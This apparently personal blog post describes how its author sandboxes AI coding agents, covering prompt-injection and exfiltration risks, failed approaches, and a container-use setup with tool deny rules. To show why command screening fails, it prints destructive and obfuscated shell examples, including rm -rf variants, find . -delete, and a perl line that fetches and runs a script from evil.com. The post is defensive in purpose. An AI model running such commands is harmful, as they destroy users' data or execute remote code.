Ryan Scott Brown

I build cloud-based systems for startups and enterprises. My background in operations gives me a unique focus on writing observable, reliable software and automating maintenance work.

I love learning and teaching about Amazon Web Services, automation tools such as Ansible, and the serverless ecosystem. I most often write code in Python, TypeScript, and Rust.

B.S. Applied Networking and Systems Administration, minor in Software Engineering from Rochester Institute of Technology.

Delegating Authority to Capricious Agents

I’ve been looking for a good way to context switch less often when using tools like Claude Code and GitHub Copilot. So far, one of my biggest obstacles has been the approval process. I want to come back to “complete” changesets to review and apply at my leisure, not stare at the model talking nonsense to itself.

Claude Code repeatedly attempting to replace the string z.string().datetime() with z.iso.datetime() and failing, resorting to calling itself silly and continuing to mix up the two strings.

In addition to not wanting to sit there and read the “reasoning” (read: LLM talking to itself), there’s a trust problem.

Coding agents fall squarely in Simon Willison’s lethal trifecta if you let them run arbitrary commands on your machine:

Access to private data: Your source code, at least. Even if you accept that risk, an open shell with your own permissions can see browser cookies, SSH keys, known_hosts files, API keys in plain text, and all manner of other things.
Untrusted content: A web search can expose your LLM to SEO squatters that use Open Graph or other meta tags for prompt injection.
External communications: curl -XPOST is plenty, but there’s also mail.

What’s an engineer to do? Take out pieces of the trifecta until it’s not scary.

Access to private data: Source code and instructions are an acceptable risk (for me), but I’d like to scope down to only the current project and no system files.
Untrusted content: Reduce exposure to external content by requiring approval for WebSearch.
External communications: Lock down Fetch to an allow-list of domains.
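The Fetch restriction comes down to a host check before any request goes out. Here’s a minimal Python sketch of that check. The domain list, the https-only rule, and the `is_allowed_url` name are my own assumptions for illustration. This is not how Claude Code or any other agent implements its allow-list.

```python
from urllib.parse import urlsplit

# Hypothetical allow-list; substitute the domains your project actually needs.
ALLOWED_DOMAINS = frozenset({"docs.python.org", "pypi.org", "github.com"})


def is_allowed_url(url: str, allowed: frozenset[str] = ALLOWED_DOMAINS) -> bool:
    """True if url is https and its host is an allowed domain or a subdomain of one."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    host = (parts.hostname or "").rstrip(".")  # .hostname is already lowercased
    # Exact match or a real subdomain ("api.github.com"), but never a
    # look-alike such as "evilgithub.com" or "github.com.attacker.example".
    return bool(host) and any(host == d or host.endswith("." + d) for d in allowed)


if __name__ == "__main__":
    for url in [
        "https://docs.python.org/3/library/shlex.html",
        "https://api.github.com/repos",
        "https://evilgithub.com/payload",
        "http://pypi.org/simple/",
        "https://github.com.attacker.example/x",
    ]:
        print(is_allowed_url(url), url)
```

The key design choice is matching on the parsed hostname rather than a string prefix. `https://github.com.attacker.example/x` starts with `https://github.com`, but its host is not on the list.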

Several Dead Ends

Of the many ways I tried to do this, most came up short. Read on for a survey of discarded experiments, or skip to the path ahead with container-use to see what worked and try it yourself.

Dead End: Claude’s `git worktree` Flow

This approach is the simplest: it needs no extra tools and allows parallelism. Fire off tasks and review the code later, right?

I can review changes to apps I know well much faster than most providers can generate tokens and apply them as edits. Running these tasks headless and in parallel should have meant less babysitting, but it revealed a new problem. After 3-5 minutes, each task would hang waiting for me to approve a bash command, web search, or other tool call that wasn’t automatically allowed. Who would grant remote code execution to a zealous but gullible minion who lacks object permanence?

Instead, I went looking for ways to sandbox or delegate the tool calls into a safe environment. Most of the time, LLMs will run the benign commands you’d expect during development: pip, npm, and find. However, each of these has arguments that could quickly become a problem. Take for example (but don’t run) these gems:

# using pip from your system python instead of `poetry add` like you intended,
# and installing a package that typosquats the standard library's sqlite3. Hope it's not malicious
pip install sqlite
# uh-oh: lord knows what install scripts this one runs,
# and it installs globally rather than for your project
npm install -g naughty-pkg
# hope you pushed recently
find . -delete

It’s unlikely your instructions will lead an LLM to generate that last one, but the first two, both package management, are plausible. There are already documented cases of LLM-squatting, where commonly hallucinated package names get registered, (usually) by the good guys.
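Catching those two package-management cases is mostly argument inspection. Here’s a rough sketch with Python’s shlex. It assumes a hypothetical policy where installs should go through the project’s own tooling. The policy and the `package_command_warnings` name are mine, not part of any agent’s API. It catches honest mistakes, not a determined adversary.

```python
import shlex


def package_command_warnings(command: str) -> list[str]:
    """Return reasons a package-management command looks risky (empty list if none).

    Hypothetical policy: installs should go through the project's own tooling
    (e.g. `poetry add`, or `npm install` without -g and with scripts disabled).
    """
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes and the like
        return ["could not parse command"]
    # Treat `python -m pip ...` / `python3 -m pip ...` the same as `pip ...`.
    if len(argv) >= 3 and argv[0].startswith("python") and argv[1:3] == ["-m", "pip"]:
        argv = ["pip", *argv[3:]]
    if not argv:
        return []

    tool, args = argv[0], argv[1:]
    warnings = []
    if tool in {"pip", "pip3"} and "install" in args:
        warnings.append("bare pip install bypasses the project's dependency manager")
    # `npm i` and `npm add` are aliases for `npm install`.
    if tool == "npm" and ({"install", "i", "add"} & set(args)):
        if "-g" in args or "--global" in args:
            warnings.append("global npm install affects the whole machine")
        if "--ignore-scripts" not in args:
            warnings.append("npm will run the package's install scripts")
    return warnings


if __name__ == "__main__":
    for cmd in ["pip install sqlite", "npm install -g naughty-pkg", "poetry add requests"]:
        print(cmd, "->", package_command_warnings(cmd))
```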

It turns out parallelism is the easy part; the real problem is trust.

Dead End: Full VMs / Fat Containers

Full VMs are resource-hungry and limited parallelism to just a few running at a time. Beyond being heavy, they required a secrets-injection system so that both Claude Code and GitHub had the credentials to send patches out for review.

For Python this worked, but projects in languages with heavier dependency chains (Node.js) or high first-run costs (Rust) struggled.

This worked for Claude Code, but not for Zed Agent. In VS Code, the remote development setup felt finicky, and I couldn’t see myself using it regularly.

Dead End: Devcontainers

Maybe instead of a fully featured container or VM, an IDE-integrated tool would be more effective. Devcontainers is a portable config format that specifies a project’s development environment, mounts your local files into the container, and lets your IDE run tasks inside it. It is intended to solve the classic “works on my machine” problem, but maybe it would be enough of a sandbox for LLMs too.

If you’re already in the VS Code ecosystem, this is well supported. Zed doesn’t support it yet, but it’s easy to configure via tasks.json. Here’s the devcontainer.json that worked for me:

{
  "name": "Claude Code Sandbox",
  "image": "mcr.microsoft.com/devcontainers/base:ubuntu",
  "features": {
    "ghcr.io/devcontainers/features/node:1": {}
  },
  "remoteUser": "vscode",
  "mounts": [
    "source=claude-code-bashhistory-${devcontainerId},target=/commandhistory,type=volume",
    "source=claude-code-config,target=/home/vscode/.claude,type=volume"
  ],
  "containerEnv": {
    "CLAUDE_CONFIG_DIR": "/home/vscode/.claude"
  },
  "workspaceMount": "source=${localWorkspaceFolder},target=/workspace,type=bind,consistency=delegated",
  "workspaceFolder": "/workspace",
  "postCreateCommand": "npm install -g '@anthropic-ai/claude-code' ; cd /workspace && npm i"
}

Note the shared .claude directory to avoid re-authenticating:

"source=claude-code-config,target=/home/vscode/.claude,type=volume"

In Zed, I also needed this tasks.json to start the containers:

[
  {
    "label": "DevContainer: Up",
    "command": "npx @devcontainers/cli up --workspace-folder ${ZED_WORKTREE_ROOT}",
    "use_new_terminal": true,
    "allow_concurrent_runs": false,
    "reveal": "always"
  },
  {
    "label": "DevContainer: Build",
    "command": "npx @devcontainers/cli build --workspace-folder ${ZED_WORKTREE_ROOT}",
    "use_new_terminal": true,
    "allow_concurrent_runs": false,
    "reveal": "always"
  },
  {
    "label": "DevContainer: Claude",
    "command": "npx @devcontainers/cli exec --workspace-folder ${ZED_WORKTREE_ROOT} /bin/zsh -c 'claude'",
    "use_new_terminal": true,
    "allow_concurrent_runs": true,
    "reveal": "always"
  },
  {
    "label": "DevContainer: Shell",
    "command": "npx @devcontainers/cli exec --workspace-folder ${ZED_WORKTREE_ROOT} /bin/zsh",
    "use_new_terminal": true,
    "allow_concurrent_runs": true,
    "reveal": "always"
  }
]

Claude Code and GitHub Copilot worked in VS Code, but Zed Agents can’t connect to the containers. Worse, the containers all share the same workspace and stomp on each other’s changes. Combining this with git worktrees worked, but again, it was clunky.
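For reference, the worktree combination amounts to one branch and working tree per task, each with its own container. This is a dry-run sketch. It assumes a hypothetical layout where each task gets a sibling directory `<repo>-<task>` and a branch `agent/<task>`. The function names are made up. The devcontainers CLI call mirrors the Zed task above.

```python
import shlex
from pathlib import Path


def task_path(repo: Path, task: str) -> Path:
    """Hypothetical layout: a sibling directory named <repo>-<task>."""
    return repo.parent / f"{repo.name}-{task}"


def task_setup(repo: Path, task: str, base: str = "main") -> list[list[str]]:
    """Commands giving one task its own branch, working tree, and devcontainer."""
    path = str(task_path(repo, task))
    return [
        # git worktree add -b <new-branch> <path> <commit-ish>
        ["git", "-C", str(repo), "worktree", "add", "-b", f"agent/{task}", path, base],
        # Same devcontainers CLI call as the Zed task, pointed at the new worktree.
        ["npx", "@devcontainers/cli", "up", "--workspace-folder", path],
    ]


def task_teardown(repo: Path, task: str) -> list[list[str]]:
    """Remove the worktree once its branch has been reviewed (the branch itself is kept)."""
    return [["git", "-C", str(repo), "worktree", "remove", str(task_path(repo, task))]]


if __name__ == "__main__":
    # Dry run: print the commands instead of executing them.
    repo = Path.home() / "Code" / "myapp"
    for task in ["fix-login", "bump-deps"]:
        for argv in task_setup(repo, task):
            print(shlex.join(argv))
```

Pass each argv list to `subprocess.run(argv, check=True)` to execute it. One likely source of friction: a linked worktree’s `.git` is a file pointing at the main repository by absolute host path. Git commands inside the container may fail unless that path is mounted too.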

Dead End: Shell Risk Scoring

I tried, with some success, to build a shell command risk-scoring tool. The first version gave each base command and technique a score, summed the scores, and denied execution above a certain threshold. This seemed to work until I considered obfuscation techniques, which would take more than shlex or static analysis to assign a mostly accurate risk level.

# needs to interpolate variables to discover the command
COMMAND="rm -rf"; ${COMMAND} /var/*
# looks fine... whoops there goes your homedir
echo -e "ooroom -rf ~" | sed -e 's/o//g' | sh
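To make the failure concrete, here’s a minimal sketch of that additive approach using Python’s shlex. The weights, threshold, and function names are invented for illustration and are not the original tool’s. The shlex tokenizer settings are standard library.

```python
import shlex

# Invented weights and threshold for illustration; not the original tool's values.
COMMAND_SCORES = {"ls": 0, "cat": 0, "echo": 0, "sed": 1, "find": 2, "curl": 3, "sh": 3, "rm": 5}
TECHNIQUE_SCORES = {"|": 1, "-rf": 4, "-delete": 4}
THRESHOLD = 6


def tokens(command: str) -> list[str]:
    """Statically split a command line, keeping operators like | and ; as tokens."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def risk_score(command: str) -> int:
    """Sum the scores of every recognized command and technique token."""
    return sum(COMMAND_SCORES.get(t, 0) + TECHNIQUE_SCORES.get(t, 0) for t in tokens(command))


def allowed(command: str) -> bool:
    """Deny execution only when the summed score is above the threshold."""
    return risk_score(command) <= THRESHOLD


if __name__ == "__main__":
    examples = [
        "rm -rf ~",                                         # 9: denied
        'COMMAND="rm -rf"; ${COMMAND} /var/*',              # 0: allowed, rm hides inside a variable
        "echo -e \"ooroom -rf ~\" | sed -e 's/o//g' | sh",  # 6: allowed, rm only exists after sed runs
    ]
    for cmd in examples:
        print(risk_score(cmd), allowed(cmd), cmd)
```

The plain `rm -rf ~` is caught. The obfuscated versions score at or below the threshold, because the dangerous words only appear after the shell expands a variable or sed rewrites a string.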

Beyond intentional obfuscation, if you allow calls to Python, Perl, or any other language, your shell analysis doesn’t help at all. Even if we cut off network access, we could give an ambiguous instruction that the LLM interprets like a malevolent genie.

python -c "import os; os.system('rm -rf /')"
perl -e "system('wget -O- http://evil.com/script | sh')"

The Claude Code model of Bash(ls:*) command allow-lists is insufficient. Commands you would want accessible, like find, have options that are too destructive to leave unchecked.
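A simplified model of prefix matching shows the hole. The rules below use Claude Code’s `Bash(command:*)` syntax, but the matcher is my own approximation, not Claude Code’s implementation. The point is only that any rule broad enough to make find useful also admits `-delete` and `-exec`.

```python
import shlex

# Hypothetical allow-list written in Claude Code's Bash(prefix:*) style.
# The matcher below is a simplified model for illustration only.
ALLOW_RULES = ("Bash(ls:*)", "Bash(find:*)", "Bash(git status:*)")


def rule_prefix(rule: str) -> list[str]:
    """Turn 'Bash(git status:*)' into ['git', 'status']."""
    inner = rule.removeprefix("Bash(").removesuffix(")")
    return shlex.split(inner.removesuffix(":*"))


def prefix_allowed(command: str, rules: tuple[str, ...] = ALLOW_RULES) -> bool:
    """Allow a command if its leading words match any rule's prefix."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return False  # unparseable: deny
    return any(argv[: len(p)] == p for p in map(rule_prefix, rules))


if __name__ == "__main__":
    for cmd in [
        "find . -name '*.py'",        # the use you had in mind
        "find . -delete",             # also matches Bash(find:*)
        "find . -exec rm -rf {} +",   # so does this
        "rm -rf .",                   # refused: no rule starts with rm
    ]:
        print(prefix_allowed(cmd), cmd)
```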

Path Ahead: Container-Use MCP

With all these consigned to the dustbin of ~/Code/archived/, I discovered container-use by the authors of Dagger. The container composition DSL never clicked for me when I tried it for CI on a different project. Call me old-fashioned, but Dockerfile has a certain je ne sais quoi.

A hint of nostalgia. FROM alpine:3 with love.

container-use includes an MCP server that allows tool-calling LLMs to start with a new branch checked out in the container, run arbitrary commands, install anything they need in the container, and automatically commit each edit.

The MCP server can be configured to work with Zed, GitHub Copilot, or Claude Code. The docs also include instructions for Amazon Q, Cline, and others.

This is the closest I’ve found so far to my ideal workflow. A typical session might look like this:

claude -p 'florp the gibbets and reverse polarity on the quibblers'
# review the changes
container-use diff florp-bopper
# if things look good
container-use checkout florp-bopper
# testing steps
container-use apply florp-bopper
# compact the (many) LLM commits into something more semantic
git commit

I can spin off several of these with permissions granted to change their own environments, then come back to review the whole batch of changes.
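Spinning off a batch means starting several headless runs and collecting their output. Here’s a rough sketch. It assumes the container-use MCP server is already configured, so each `claude -p` run does its work in its own environment. The `launch_all` helper and the log layout are hypothetical, and the demo uses `echo` as a stand-in for `claude -p`.

```python
import subprocess
import tempfile
from pathlib import Path


def launch_all(prompts: list[str], log_dir: Path,
               base_cmd: tuple[str, ...] = ("claude", "-p")) -> list[int]:
    """Start one headless agent run per prompt, wait for all of them, return exit codes.

    Each run's combined stdout/stderr goes to log_dir/task-<n>.log for later review.
    """
    log_dir.mkdir(parents=True, exist_ok=True)
    running = []
    for n, prompt in enumerate(prompts):
        log = open(log_dir / f"task-{n}.log", "w")  # closed after the process exits
        proc = subprocess.Popen([*base_cmd, prompt], stdout=log, stderr=subprocess.STDOUT)
        running.append((proc, log))
    # Every process was started before any is waited on, so they run concurrently.
    codes = []
    for proc, log in running:
        codes.append(proc.wait())
        log.close()
    return codes


if __name__ == "__main__":
    # Dry run with `echo` standing in for `claude -p`.
    with tempfile.TemporaryDirectory() as tmp:
        prompts = ["florp the gibbets", "reverse polarity on the quibblers"]
        print(launch_all(prompts, Path(tmp), base_cmd=("echo",)))
```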

Try It!

To use the same configuration in your repo, apply this patch with git am:

curl -vsO https://rsb.io/patches/0001-Configure-container-use-for-Claude-Code-Zed-Agent.patch
git am 0001-Configure-container-use-for-Claude-Code-Zed-Agent.patch
rm 0001-Configure-container-use-for-Claude-Code-Zed-Agent.patch
# finish the setup instructions from
cat README.container-use.md

For other platforms, follow the MCP quickstart. The difference between the quickstart and applying the above patch is that the patch includes Claude and Zed Agent rules to deny access to their normal edit/run tools. With these in place, you can fire off tasks without sticking around to approve commands.
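For Claude Code, rules like these live in the permissions section of a project’s .claude/settings.json. Here’s a sketch that generates one. It is a guess at the general shape, not the contents of the patch. The server name `container-use` and the domain list are assumptions. Tool names follow Claude Code’s permission syntax as I understand it, so check them against the current docs.

```python
import json


# A guess at the general shape of such rules, NOT the contents of the patch.
# "container-use" is assumed to be the name the MCP server was registered under.
def container_use_settings(server_name: str = "container-use",
                           fetch_domains: tuple[str, ...] = ("docs.python.org",)) -> dict:
    """Build a .claude/settings.json body that routes work through container-use."""
    return {
        "permissions": {
            # Every tool exposed by the MCP server, plus fetches to a few domains.
            "allow": [f"mcp__{server_name}"] + [f"WebFetch(domain:{d})" for d in fetch_domains],
            # Built-in tools that would edit files or run commands on the host.
            "deny": ["Bash", "Edit", "MultiEdit", "Write", "NotebookEdit"],
        }
    }


if __name__ == "__main__":
    # Print rather than write, so you can review before saving to .claude/settings.json.
    print(json.dumps(container_use_settings(), indent=2))
```

Anything left unlisted, such as WebSearch, should fall back to Claude Code’s default of asking for approval. That matches the goal of requiring approval for searches.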

Unfortunately, the instructions require changes to your global Zed settings. Per-project settings for Zed Agents don’t work as of v0.200.5. Ideally, Agent profiles would be shareable as part of a project.

I find roughly coin-flip odds that a patch will need to be thrown away; your “prompt engineering” mileage may vary.
